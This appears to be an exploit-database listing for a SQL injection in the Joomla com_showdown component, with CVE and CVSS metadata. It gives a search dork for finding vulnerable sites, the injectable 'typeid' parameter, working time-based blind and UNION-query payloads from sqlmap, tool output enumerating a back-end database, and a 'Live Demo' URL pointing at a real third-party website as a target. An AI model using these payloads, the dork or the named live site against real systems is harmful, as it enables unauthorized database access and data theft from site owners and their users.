Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2018-20401 | CWE-89 | Not specified | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
exploitalert.com | High | Remote | 2016-07-25 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |
Joomla com_showdown SQL injection Vulnerability ###################### # Exploit Title : Joomla com_showdown SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : inurl:index.php?option=com_showdown # version : 1.5.0 # Tested on: [ Windows 7 ] # skype:xbadgirl21 # Date: 2016/07/24 # video Proof : https://youtu.be/IglNYsDcV3g ###################### # [+] DESCRIPTION : ###################### # [+] an SQL injection been Detected in this Joomla components showdown after you add ['] or ["] to # [+] Vuln Target Parameter you will get error like : # [+] You have an error in your SQL syntax; check the manual that corresponds to your MySQL or # [+] You Will Notice a change in the Frontpage of the target . ###################### # [+] Poc : ###################### # [typeid] Get Parameter Vulnerable To SQLi # http://127.0.0.1/index.php?option=com_showdown&typeid=999999 [INJECT HERE] ###################### # [+] SQLmap PoC: ###################### # GET parameter 'typeid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] # # Parameter: typeid (GET) # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload: option=com_showdown&typeid=11 AND SLEEP(5) # # Type: UNION query # Title: Generic UNION query (NULL) - 6 columns # Payload: option=com_showdown&typeid=11 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71627a6b71,0x4d7254764c576b495a504e73726d636f6a65695971624f6f64424e6870 # 43554447614a527451564c,0x71706a7171),NULL-- LZga # --- # [12:59:46] [INFO] the back-end DBMS is MySQL # web server operating system: Linux Debian 6.0 (squeeze) # web application technology: PHP 5.2.6, Apache 2.2.16 # back-end DBMS: MySQL >= 5.0.12 # [12:59:46] [INFO] fetching database names # available databases [3]: ###################### # [+] Live Demo : ###################### # http://www.circuse.eu/index.php?option=com_showdown&typeid=11 ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.